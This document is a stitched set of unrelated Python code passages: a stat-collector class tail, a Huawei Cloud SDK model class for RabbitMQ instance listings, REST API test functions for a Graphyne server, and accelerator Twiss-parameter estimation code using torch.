return self.produce_diffs and self.rows_prev and self.rows_cur
def tick(self):
self.ticks += 1
def needs_refresh(self):
return self.ticks % self.ticks_per_refresh == 0
def refresh(self):
self._do_refresh(None)
def ident(self):
return str(self.__class__).lower().split('.')[-1].split('statcollector')[0]
def ncurses_set_prefix(self, new_prefix):
self.ncurses_custom_fields['prefix'] | |
# coding: utf-8
import pprint
import re
import six
class ListInstancesRespInstances:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'name': 'str',
'engine': 'str',
'engine_version': 'str',
'specification': 'str',
'storage_space': 'int',
'used_storage_space': 'int',
'connect_address': 'str',
'port': 'int',
'status': 'str',
'description': 'str',
'instance_id': 'str',
'resource_spec_code': 'str',
'charging_mode': 'int',
'vpc_id': 'str',
'vpc_name': 'str',
'created_at': 'str',
'user_id': 'str',
'user_name': 'str',
'order_id': 'str',
'maintain_begin': 'str',
'maintain_end': 'str',
'enable_publicip': 'bool',
'publicip_address': 'str',
'publicip_id': 'str',
'management_connect_address': 'str',
'ssl_enable': 'bool',
'enterprise_project_id': 'str',
'is_logical_volume': 'bool',
'extend_times': 'int',
'type': 'str',
'product_id': 'str',
'security_group_id': 'str',
'security_group_name': 'str',
'subnet_id': 'str',
'available_zones': 'list[str]',
'total_storage_space': 'int',
'storage_resource_id': 'str',
'storage_spec_code': 'str',
'service_type': 'str',
'storage_type': 'str',
'ipv6_enable': 'bool',
'ipv6_connect_addresses': 'list[str]'
}
attribute_map = {
'name': 'name',
'engine': 'engine',
'engine_version': 'engine_version',
'specification': 'specification',
'storage_space': 'storage_space',
'used_storage_space': 'used_storage_space',
'connect_address': 'connect_address',
'port': 'port',
'status': 'status',
'description': 'description',
'instance_id': 'instance_id',
'resource_spec_code': 'resource_spec_code',
'charging_mode': 'charging_mode',
'vpc_id': 'vpc_id',
'vpc_name': 'vpc_name',
'created_at': 'created_at',
'user_id': 'user_id',
'user_name': 'user_name',
'order_id': 'order_id',
'maintain_begin': 'maintain_begin',
'maintain_end': 'maintain_end',
'enable_publicip': 'enable_publicip',
'publicip_address': 'publicip_address',
'publicip_id': 'publicip_id',
'management_connect_address': 'management_connect_address',
'ssl_enable': 'ssl_enable',
'enterprise_project_id': 'enterprise_project_id',
'is_logical_volume': 'is_logical_volume',
'extend_times': 'extend_times',
'type': 'type',
'product_id': 'product_id',
'security_group_id': 'security_group_id',
'security_group_name': 'security_group_name',
'subnet_id': 'subnet_id',
'available_zones': 'available_zones',
'total_storage_space': 'total_storage_space',
'storage_resource_id': 'storage_resource_id',
'storage_spec_code': 'storage_spec_code',
'service_type': 'service_type',
'storage_type': 'storage_type',
'ipv6_enable': 'ipv6_enable',
'ipv6_connect_addresses': 'ipv6_connect_addresses'
}
def __init__(self, name=None, engine=None, engine_version=None, specification=None, storage_space=None, used_storage_space=None, connect_address=None, port=None, status=None, description=None, instance_id=None, resource_spec_code=None, charging_mode=None, vpc_id=None, vpc_name=None, created_at=None, user_id=None, user_name=None, order_id=None, maintain_begin=None, maintain_end=None, enable_publicip=None, publicip_address=None, publicip_id=None, management_connect_address=None, ssl_enable=None, enterprise_project_id=None, is_logical_volume=None, extend_times=None, type=None, product_id=None, security_group_id=None, security_group_name=None, subnet_id=None, available_zones=None, total_storage_space=None, storage_resource_id=None, storage_spec_code=None, service_type=None, storage_type=None, ipv6_enable=None, ipv6_connect_addresses=None):
"""ListInstancesRespInstances - a model defined in huaweicloud sdk"""
self._name = None
self._engine = None
self._engine_version = None
self._specification = None
self._storage_space = None
self._used_storage_space = None
self._connect_address = None
self._port = None
self._status = None
self._description = None
self._instance_id = None
self._resource_spec_code = None
self._charging_mode = None
self._vpc_id = None
self._vpc_name = None
self._created_at = None
self._user_id = None
self._user_name = None
self._order_id = None
self._maintain_begin = None
self._maintain_end = None
self._enable_publicip = None
self._publicip_address = None
self._publicip_id = None
self._management_connect_address = None
self._ssl_enable = None
self._enterprise_project_id = None
self._is_logical_volume = None
self._extend_times = None
self._type = None
self._product_id = None
self._security_group_id = None
self._security_group_name = None
self._subnet_id = None
self._available_zones = None
self._total_storage_space = None
self._storage_resource_id = None
self._storage_spec_code = None
self._service_type = None
self._storage_type = None
self._ipv6_enable = None
self._ipv6_connect_addresses = None
self.discriminator = None
if name is not None:
self.name = name
if engine is not None:
self.engine = engine
if engine_version is not None:
self.engine_version = engine_version
if specification is not None:
self.specification = specification
if storage_space is not None:
self.storage_space = storage_space
if used_storage_space is not None:
self.used_storage_space = used_storage_space
if connect_address is not None:
self.connect_address = connect_address
if port is not None:
self.port = port
if status is not None:
self.status = status
if description is not None:
self.description = description
if instance_id is not None:
self.instance_id = instance_id
if resource_spec_code is not None:
self.resource_spec_code = resource_spec_code
if charging_mode is not None:
self.charging_mode = charging_mode
if vpc_id is not None:
self.vpc_id = vpc_id
if vpc_name is not None:
self.vpc_name = vpc_name
if created_at is not None:
self.created_at = created_at
if user_id is not None:
self.user_id = user_id
if user_name is not None:
self.user_name = user_name
if order_id is not None:
self.order_id = order_id
if maintain_begin is not None:
self.maintain_begin = maintain_begin
if maintain_end is not None:
self.maintain_end = maintain_end
if enable_publicip is not None:
self.enable_publicip = enable_publicip
if publicip_address is not None:
self.publicip_address = publicip_address
if publicip_id is not None:
self.publicip_id = publicip_id
if management_connect_address is not None:
self.management_connect_address = management_connect_address
if ssl_enable is not None:
self.ssl_enable = ssl_enable
if enterprise_project_id is not None:
self.enterprise_project_id = enterprise_project_id
if is_logical_volume is not None:
self.is_logical_volume = is_logical_volume
if extend_times is not None:
self.extend_times = extend_times
if type is not None:
self.type = type
if product_id is not None:
self.product_id = product_id
if security_group_id is not None:
self.security_group_id = security_group_id
if security_group_name is not None:
self.security_group_name = security_group_name
if subnet_id is not None:
self.subnet_id = subnet_id
if available_zones is not None:
self.available_zones = available_zones
if total_storage_space is not None:
self.total_storage_space = total_storage_space
if storage_resource_id is not None:
self.storage_resource_id = storage_resource_id
if storage_spec_code is not None:
self.storage_spec_code = storage_spec_code
if service_type is not None:
self.service_type = service_type
if storage_type is not None:
self.storage_type = storage_type
if ipv6_enable is not None:
self.ipv6_enable = ipv6_enable
if ipv6_connect_addresses is not None:
self.ipv6_connect_addresses = ipv6_connect_addresses
@property
def name(self):
"""Gets the name of this ListInstancesRespInstances.
实例名称。
:return: The name of this ListInstancesRespInstances.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ListInstancesRespInstances.
实例名称。
:param name: The name of this ListInstancesRespInstances.
:type: str
"""
self._name = name
@property
def engine(self):
"""Gets the engine of this ListInstancesRespInstances.
引擎。
:return: The engine of this ListInstancesRespInstances.
:rtype: str
"""
return self._engine
@engine.setter
def engine(self, engine):
"""Sets the engine of this ListInstancesRespInstances.
引擎。
:param engine: The engine of this ListInstancesRespInstances.
:type: str
"""
self._engine = engine
@property
def engine_version(self):
"""Gets the engine_version of this ListInstancesRespInstances.
版本。
:return: The engine_version of this ListInstancesRespInstances.
:rtype: str
"""
return self._engine_version
@engine_version.setter
def engine_version(self, engine_version):
"""Sets the engine_version of this ListInstancesRespInstances.
版本。
:param engine_version: The engine_version of this ListInstancesRespInstances.
:type: str
"""
self._engine_version = engine_version
@property
def specification(self):
"""Gets the specification of this ListInstancesRespInstances.
实例规格。 - RabbitMQ实例单机返回vm规格。 - RabbitMQ实例集群返回vm规格和节点数。
:return: The specification of this ListInstancesRespInstances.
:rtype: str
"""
return self._specification
@specification.setter
def specification(self, specification):
"""Sets the specification of this ListInstancesRespInstances.
实例规格。 - RabbitMQ实例单机返回vm规格。 - RabbitMQ实例集群返回vm规格和节点数。
:param specification: The specification of this ListInstancesRespInstances.
:type: str
"""
self._specification = specification
@property
def storage_space(self):
"""Gets the storage_space of this ListInstancesRespInstances.
消息存储空间,单位:GB。
:return: The storage_space of this ListInstancesRespInstances.
:rtype: int
"""
return self._storage_space
@storage_space.setter
def storage_space(self, storage_space):
"""Sets the storage_space of this ListInstancesRespInstances.
消息存储空间,单位:GB。
:param storage_space: The storage_space of this ListInstancesRespInstances.
:type: int
"""
self._storage_space = storage_space
@property
def used_storage_space(self):
"""Gets the used_storage_space of this ListInstancesRespInstances.
已使用的消息存储空间,单位:GB。
:return: The used_storage_space of this ListInstancesRespInstances.
:rtype: int
"""
return self._used_storage_space
@used_storage_space.setter
def used_storage_space(self, used_storage_space):
"""Sets the used_storage_space of this ListInstancesRespInstances.
已使用的消息存储空间,单位:GB。
:param used_storage_space: The used_storage_space of this ListInstancesRespInstances.
:type: int
"""
self._used_storage_space = used_storage_space
@property
def connect_address(self):
"""Gets the connect_address of this ListInstancesRespInstances.
实例连接IP地址。
:return: The connect_address of this ListInstancesRespInstances.
:rtype: str
"""
return self._connect_address
@connect_address.setter
def connect_address(self, connect_address):
"""Sets the connect_address of this ListInstancesRespInstances.
实例连接IP地址。
:param connect_address: The connect_address of this ListInstancesRespInstances.
:type: str
"""
self._connect_address = connect_address
@property
def port(self):
"""Gets the port of this ListInstancesRespInstances.
实例连接端口。
:return: The port of this ListInstancesRespInstances.
:rtype: int
"""
return self._port
@port.setter
def port(self, port):
"""Sets the port of this ListInstancesRespInstances.
实例连接端口。
:param port: The port of this ListInstancesRespInstances.
:type: int
"""
self._port = port
@property
def status(self):
"""Gets the status of this ListInstancesRespInstances.
实例的状态。详细状态说明见[实例状态说明](https://support.huaweicloud.com/api-rabbitmq/rabbitmq-api-180514012.html)。
:return: The status of this ListInstancesRespInstances.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ListInstancesRespInstances.
实例的状态。详细状态说明见[实例状态说明](https://support.huaweicloud.com/api-rabbitmq/rabbitmq-api-180514012.html)。
:param status: The status of this ListInstancesRespInstances.
:type: str
"""
self._status = status
@property
def description(self):
"""Gets the description of this ListInstancesRespInstances.
实例描述。
:return: The description of this ListInstancesRespInstances.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this ListInstancesRespInstances.
实例描述。
:param description: The description of this ListInstancesRespInstances.
:type: str
"""
self._description = description
@property
def instance_id(self):
"""Gets the instance_id of this ListInstancesRespInstances.
实例ID。
:return: The instance_id of this ListInstancesRespInstances.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""Sets the instance_id of this ListInstancesRespInstances.
实例ID。
:param instance_id: The instance_id of this ListInstancesRespInstances.
:type: str
"""
self._instance_id = instance_id
@property
def resource_spec_code(self):
"""Gets the resource_spec_code of this ListInstancesRespInstances.
资源规格标识。 - dms.instance.rabbitmq.single.c3.2u4g:RabbitMQ单机,vm规格2u4g - dms.instance.rabbitmq.single.c3.4u8g:RabbitMQ单机,vm规格4u8g - dms.instance.rabbitmq.single.c3.8u16g:RabbitMQ单机,vm规格8u16g - dms.instance.rabbitmq.single.c3.16u32g:RabbitMQ单机,vm规格16u32g - dms.instance.rabbitmq.cluster.c3.4u8g.3:RabbitMQ集群,vm规格4u8g,3个节点 - dms.instance.rabbitmq.cluster.c3.4u8g.5:RabbitMQ集群,vm规格4u8g,5个节点 - dms.instance.rabbitmq.cluster.c3.4u8g.7:RabbitMQ集群,vm规格4u8g,7个节点 - dms.instance.rabbitmq.cluster.c3.8u16g.3:RabbitMQ集群,vm规格8u16g,3个节点 - dms.instance.rabbitmq.cluster.c3.8u16g.5:RabbitMQ集群,vm规格8u16g,5个节点 - dms.instance.rabbitmq.cluster.c3.8u16g.7:RabbitMQ集群,vm规格8u16g,7个节点 - dms.instance.rabbitmq.cluster.c3.16u32g.3:RabbitMQ集群,vm规格16u32g,3个节点 - dms.instance.rabbitmq.cluster.c3.16u32g.5:RabbitMQ集群,vm规格16u32g,5个节点 - dms.instance.rabbitmq.cluster.c3.16u32g.7:RabbitMQ集群,vm规格16u32g,7个节点
:return: The resource_spec_code of this | |
to be fully up before continuing
while serverStartupStatus != 200:
try:
#urllib GET request
statusRequest = urllib.request.urlopen(statusURL)
serverStartupStatus = statusRequest.code
except Exception as e:
if currTime > timeoutVal:
#We have reached timeout and the server is not started
raise e
if e.code == 503:
time.sleep(10.0)
currTime = currTime + 10
elif e.code == 500:
raise e
except Exception as e:
testResult = False
Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
expectedCodeS = convertIntListToString(expectedCode)
statusString = "Expected Status: %s, Status: %s" %(expectedCodeS, serverStartupStatus)
results = [1, testcase, testResult, expectedResult, [statusString]]
resultSet.append(results)
return resultSet
def testServerAPIAdminStop(testcase, expectedCode, serverURL = None):
"""
Check to see that the server status works.
This test stops a currently running server
Test Cases:
testcase = "simplestop"
expectedResult = [200]
#Should ale=ways return 503, because the server has not yet started
testcase = "already stopping"
expectedResult = [202, 200]
#Might return 200, depending on how quickly the server stops. Otherwise, 202
"""
method = moduleName + '.' + 'testServerAPIAdminStop'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
serverStartupStatus = None
statusURL = serverURL + "/admin/stop"
try:
#urllib GET request
statusRequest = urllib.request.urlopen(statusURL)
serverStartupStatus = statusRequest.code
except urllib.error.URLError as e:
testResult = False
serverStartupStatus = e.reason
except Exception as e:
if e.code not in expectedCode:
testResult = False
elif e.code == 500:
testResult = False
Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
expectedCodeS = convertIntListToString(expectedCode)
statusString = "Expected Status: %s, Status: %s" %(expectedCodeS, serverStartupStatus)
results = [1, testcase, testResult, expectedResult, [statusString]]
resultSet.append(results)
return resultSet
def testServerAPICreateEntityFromMeme(serverURL = None, memePath = "Graphyne.Generic"):
"""
Tests the /modeling/createEntityFromMeme/<memePath>
1 - Create an entity of meme type memePath using /modeling/createEntityFromMeme/<memePath>
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
notes = ""
try:
#urllib GET request
createResponse = urllib.request.urlopen(createEntityURL)
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
results = [1, "Create entity and retrieve type", testResult, expectedResult, [notes]]
resultSet.append(results)
return resultSet
def testServerAPIGetEntityMemeType(serverURL = None, memePath = "Graphyne.Generic"):
"""
Tests the /modeling/createEntityFromMeme/<memePath> and /modeling/getEntityMemeType/<entityUUID> REST API calls
1 - Create an entity of meme type memePath using /modeling/createEntityFromMeme/<memePath>
2 - Given the UUID returned from the first cvall, request its type via /modeling/getEntityMemeType/<entityUUID>
3 - the returned type should be the same as the original memePath
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
notes = ""
try:
#urllib GET request
createResponse = urllib.request.urlopen(createEntityURL)
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
createResponseJsonB = createResponse.read()
entityUUIDJson = json.loads(createResponseJsonB)
getEntityMemeTypeURL = serverURL + "/modeling/getEntityMemeType/%s" %entityUUIDJson["entityUUID"]
try:
#urllib GET request
getTypeResponse = urllib.request.urlopen(getEntityMemeTypeURL)
getTypeResponseJsonB = getTypeResponse.read()
getTypeResponseJson = json.loads(getTypeResponseJsonB)
entityType = getTypeResponseJson["memeType"]
if entityType != memePath:
testResult = False
notes = "Meme type returned = %s. Should be %s" %(entityType, memePath)
except Exception as e:
testResult = False
Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
results = [1, "Create entity and retrieve type", testResult, expectedResult, [notes]]
resultSet.append(results)
return resultSet
def testServerAPIGetEntityMetaMemeType(serverURL = None, memePath = "Graphyne.Generic", metaMemePath = "Graphyne.GenericMetaMeme"):
"""
Tests the /modeling/createEntityFromMeme/<memePath> and /modeling/getEntityMemeType/<entityUUID> REST API calls
1 - Create an entity of meme type memePath using /modeling/createEntityFromMeme/<memePath>
2 - Given the UUID returned from the first cvall, request its type via /modeling/getEntityMemeType/<entityUUID>
3 - the returned type should be the same as the original memePath
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
notes = ""
try:
#urllib GET request
createResponse = urllib.request.urlopen(createEntityURL)
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
createResponseJsonB = createResponse.read()
entityUUIDJson = json.loads(createResponseJsonB)
getEntityMetaMemeTypeURL = serverURL + "/modeling/getEntityMetaMemeType/%s" %entityUUIDJson["entityUUID"]
try:
#urllib GET request
getTypeResponse = urllib.request.urlopen(getEntityMetaMemeTypeURL)
getTypeResponseJsonB = getTypeResponse.read()
getTypeResponseJson = json.loads(getTypeResponseJsonB)
entityType = getTypeResponseJson["mmetaMmeType"]
if entityType != metaMemePath:
testResult = False
notes = "Meta Meme type returned = %s. Should be %s" %(entityType, metaMemePath)
except Exception as e:
testResult = False
Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
results = [1, "Create entity and retrieve type", testResult, expectedResult, [notes]]
resultSet.append(results)
return resultSet
def testServerAPIGetEntitiesByMemeType(serverURL = None, memePath = "Graphyne.Generic"):
"""
Tests the /modeling/getEntitiesByMemeType/<memePath>
1 - Create an entity, using /modeling/createEntityFromMeme/
2 - Get the entities of that type, using /modeling/getEntitiesByMemeType
3 - Make sure that the entity created in step 1 is in the list.
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/getEntitiesByMemeType/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
getEntityURL = serverURL + "/modeling/getEntitiesByMemeType/%s" %memePath
notes = ""
entityID = None
try:
#urllib GET request
createResponse = urllib.request.urlopen(createEntityURL)
createResponseJsonB = createResponse.read()
entityUUIDJson = json.loads(createResponseJsonB)
entityID = entityUUIDJson["entityUUID"]
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
notes = e.reason
if testResult != False:
try:
#urllib GET request
getResponse = urllib.request.urlopen(getEntityURL)
getResponseJsonB = getResponse.read()
getUUIDJson = json.loads(getResponseJsonB)
entityIDList = getUUIDJson["entityIDList"]
if entityID not in entityIDList:
entityIDListS = ", ".join(entityIDList)
notes = "Entity %s was %s" %(entityID, entityIDListS)
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
results = [1, "Check to see if entity is in list of type", testResult, expectedResult, [notes]]
resultSet.append(results)
return resultSet
def testServerAPIGetEntitiesByMetaMemeType(serverURL = None, memePath = "Graphyne.Generic", metaMemePath = "Graphyne.GenericMetaMeme"):
"""
Tests the /modeling/getEntitiesByMetaMemeType/<memePath>
1 - Create an entity, using /modeling/createEntityFromMeme/
2 - Get the entities of that type, using /modeling/getEntitiesByMetaMemeType
3 - Make sure that the entity created in step 1 is in the list.
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/getEntitiesByMetaMemeType/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
getEntityURL = serverURL + "/modeling/getEntitiesByMetaMemeType/%s" %metaMemePath
notes = ""
entityID = None
try:
#urllib GET request
createResponse = urllib.request.urlopen(createEntityURL)
createResponseJsonB = createResponse.read()
entityUUIDJson = json.loads(createResponseJsonB)
entityID = entityUUIDJson["entityUUID"]
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
notes = e.reason
if testResult != False:
try:
#urllib GET request
getResponse = urllib.request.urlopen(getEntityURL)
getResponseJsonB = getResponse.read()
getUUIDJson = json.loads(getResponseJsonB)
entityIDList = getUUIDJson["entityIDList"]
if entityID not in entityIDList:
entityIDListS = ", ".join(entityIDList)
notes = "Entity %s was %s" %(entityID, entityIDListS)
except urllib.error.URLError as e:
testResult = False
notes = e.reason
except Exception as e:
testResult = False
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
results = [1, "Check to see if entity is in list of type", testResult, expectedResult, [notes]]
resultSet.append(results)
return resultSet
def testServerAPIAddEntityLink(serverURL = None, memePath = "Graphyne.Generic", linkAttributes = {}, linkType = 1):
"""
Tests the /modeling/addEntityLink REST API call
1 - Create two entities of meme type memePath using /modeling/createEntityFromMeme/<memePath>
2 - Link them via via /modeling/addEntityLink
3 - Should not cause any errors. We'll check to see if they are actually linked via another test
"""
#"NumericValue.nv_intValue_3"
method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
testResult = True
createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
notes = ""
try:
#create two generic entities
createResponse1 = | |
corrected phases
use_correct_sigma: bool
flag to use corrected phase errors
use_model: bool
flag to use precomputed model data
Returns
-------
None, update self.twiss_from_phase dictionary
"""
self.data_phase = {}
fx = self.fx_correct if use_correct else self.fx
fy = self.fy_correct if use_correct else self.fy
sigma_fx = self.sigma_fx_correct if use_correct_sigma else self.sigma_fx
sigma_fy = self.sigma_fy_correct if use_correct_sigma else self.sigma_fy
ax_m, bx_m = self.model.ax, self.model.bx
ay_m, by_m = self.model.ay, self.model.by
index = self.combo.swapaxes(0, -1)
value, sigma = Decomposition.phase_advance(*index, self.table.nux, fx, error=error, model=False, sigma_frequency=self.table.sigma_nux, sigma_phase=sigma_fx)
fx_ij, fx_ik = value.swapaxes(0, 1)
sx_ij, sx_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.table.nuy, fy, error=error, model=False, sigma_frequency=self.table.sigma_nuy, sigma_phase=sigma_fy)
fy_ij, fy_ik = value.swapaxes(0, 1)
sy_ij, sy_ik = sigma.swapaxes(0, 1)
if use_model:
fx_m_ij, fx_m_ik = self.fx_ij, self.fx_ik
sx_m_ij, sx_m_ik = self.sigma_fx_ij, self.sigma_fx_ik
fy_m_ij, fy_m_ik = self.fy_ij, self.fy_ik
sy_m_ij, sy_m_ik = self.sigma_fy_ij, self.sigma_fy_ik
else:
value, sigma = Decomposition.phase_advance(*index, self.model.nux, self.model.fx, error=error*model, model=True, sigma_frequency=self.model.sigma_nux, sigma_phase=self.model.sigma_fx)
fx_m_ij, fx_m_ik = value.swapaxes(0, 1)
sx_m_ij, sx_m_ik = sigma.swapaxes(0, 1)
value, sigma = Decomposition.phase_advance(*index, self.model.nuy, self.model.fy, error=error*model, model=True, sigma_frequency=self.model.sigma_nuy, sigma_phase=self.model.sigma_fy)
fy_m_ij, fy_m_ik = value.swapaxes(0, 1)
sy_m_ij, sy_m_ik = sigma.swapaxes(0, 1)
ax, sigma_ax = self.phase_alfa(ax_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ax, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
bx, sigma_bx = self.phase_beta(bx_m, fx_ij, fx_m_ij, fx_ik, fx_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_bx, sigma_f_ij=sx_ij, sigma_f_ik=sx_ik, sigma_f_m_ij=sx_m_ij, sigma_f_m_ik=sx_m_ik)
ay, sigma_ay = self.phase_alfa(ay_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_a_m=self.model.sigma_ay, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
by, sigma_by = self.phase_beta(by_m, fy_ij, fy_m_ij, fy_ik, fy_m_ik, error=error, model=model, sigma_b_m=self.model.sigma_by, sigma_f_ij=sy_ij, sigma_f_ik=sy_ik, sigma_f_m_ij=sy_m_ij, sigma_f_m_ik=sy_m_ik)
self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij'] = fx_ij.T, sx_ij.T, fx_m_ij.T, sx_m_ij.T
self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik'] = fx_ik.T, sx_ik.T, fx_m_ik.T, sx_m_ik.T
self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij'] = fy_ij.T, sy_ij.T, fy_ij.T, sy_m_ij.T
self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik'] = fy_ik.T, sy_ik.T, fy_ik.T, sy_m_ik.T
self.data_phase['ax'], self.data_phase['sigma_ax'], self.data_phase['bx'], self.data_phase['sigma_bx'] = ax.T, sigma_ax.T, bx.T, sigma_bx.T
self.data_phase['ay'], self.data_phase['sigma_ay'], self.data_phase['by'], self.data_phase['sigma_by'] = ay.T, sigma_ay.T, by.T, sigma_by.T
def filter_twiss(self, plane:str = 'x', *,
phase:dict={'use': True, 'threshold': 10.00},
model:dict={'use': True, 'threshold': 00.50},
value:dict={'use': True, 'threshold': 00.50},
sigma:dict={'use': True, 'threshold': 00.25},
limit:dict={'use': True, 'threshold': 05.00}) -> dict:
"""
Filter twiss for given data plane and cleaning options.
Parameters
----------
plane: str
data plane ('x' or 'y')
phase: dict
clean based on advance phase data
used if 'use' is True, remove combinations with absolute value of phase advance cotangents above threshold value
model: dict
clean based on phase advance proximity to model
used if 'use' is True, remove combinations with (x - x_model)/x_model > threshold value
value: dict
clean based on estimated twiss beta error value
used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
sigma: dict
clean based on estimated phase advance error value
used if 'use' is True, remove combinations with x/sigma_x < 1/threshold value
limit: dict
clean outliers outside scaled interval
used if 'use' is True
Returns
-------
mask (torch.Tensor)
"""
size, length, *_ = self.index.shape
mask = torch.ones((size, length), device=self.device).to(torch.bool)
if plane == 'x':
a_m, b_m = self.model.ax.reshape(-1, 1), self.model.bx.reshape(-1, 1)
a, b, sigma_a, sigma_b = self.data_phase['ax'], self.data_phase['bx'], self.data_phase['sigma_ax'], self.data_phase['sigma_bx']
f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fx_ij'], self.data_phase['sigma_fx_ij'], self.data_phase['fx_m_ij'], self.data_phase['sigma_fx_m_ij']
f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fx_ik'], self.data_phase['sigma_fx_ik'], self.data_phase['fx_m_ik'], self.data_phase['sigma_fx_m_ik']
if plane == 'y':
a_m, b_m = self.model.ay.reshape(-1, 1), self.model.by.reshape(-1, 1)
a, b, sigma_a, sigma_b = self.data_phase['ay'], self.data_phase['by'], self.data_phase['sigma_ay'], self.data_phase['sigma_by']
f_ij, sigma_f_ij, f_m_ij, sigma_f_m_ij = self.data_phase['fy_ij'], self.data_phase['sigma_fy_ij'], self.data_phase['fy_m_ij'], self.data_phase['sigma_fy_m_ij']
f_ik, sigma_f_ik, f_m_ik, sigma_f_m_ik = self.data_phase['fy_ik'], self.data_phase['sigma_fy_ik'], self.data_phase['fy_m_ik'], self.data_phase['sigma_fy_m_ik']
if phase['use']:
cot_ij, cot_m_ij = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
cot_ik, cot_m_ik = torch.abs(1.0/torch.tan(f_ij)), torch.abs(1.0/torch.tan(f_m_ij))
mask *= phase['threshold'] > cot_ij
mask *= phase['threshold'] > cot_m_ij
mask *= phase['threshold'] > cot_ik
mask *= phase['threshold'] > cot_m_ik
if model['use']:
mask *= model['threshold'] > torch.abs((f_ij - f_m_ij)/f_m_ij)
mask *= model['threshold'] > torch.abs((f_ik - f_m_ik)/f_m_ik)
if value['use']:
mask *= value['threshold'] > torch.abs((b - b_m)/b_m)
if sigma['use']:
mask *= 1/sigma['threshold'] < torch.abs(f_ij/sigma_f_ij)
mask *= 1/sigma['threshold'] < torch.abs(f_ik/sigma_f_ik)
if limit['use']:
factor = torch.tensor(limit['threshold'], dtype=self.dtype, device=self.device)
mask *= threshold(standardize(a, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
mask *= threshold(standardize(b, center_estimator=median, spread_estimator=biweight_midvariance), -factor, +factor)
return mask
def mask_range(self, limit:tuple) -> torch.Tensor:
"""
Generate weight mask based on given range limit.
Parameters
----------
limit: tuple
range limit to use, (min, max), 1 <= min <= max, mim is excluded, for full range min==max
Returns
-------
weight mask (torch.Tensor)
"""
size, length, *_ = self.shape
mask = torch.zeros((size, length), dtype=torch.int64, device=self.device)
count = torch.tensor([limit*(2*limit - 1) for limit in range(1, max(self.limit) + 1)], dtype=torch.int64, device=self.device)
limit_min, limit_max = limit
if limit_min == limit_max:
count = count[:limit_max]
*_, count_max = count
mask[:, :count_max] = 1
if limit_min < limit_max:
count = count[limit_min - 1:limit_max]
count_min, *_, count_max = count
mask[:, count_min:count_max] = 1
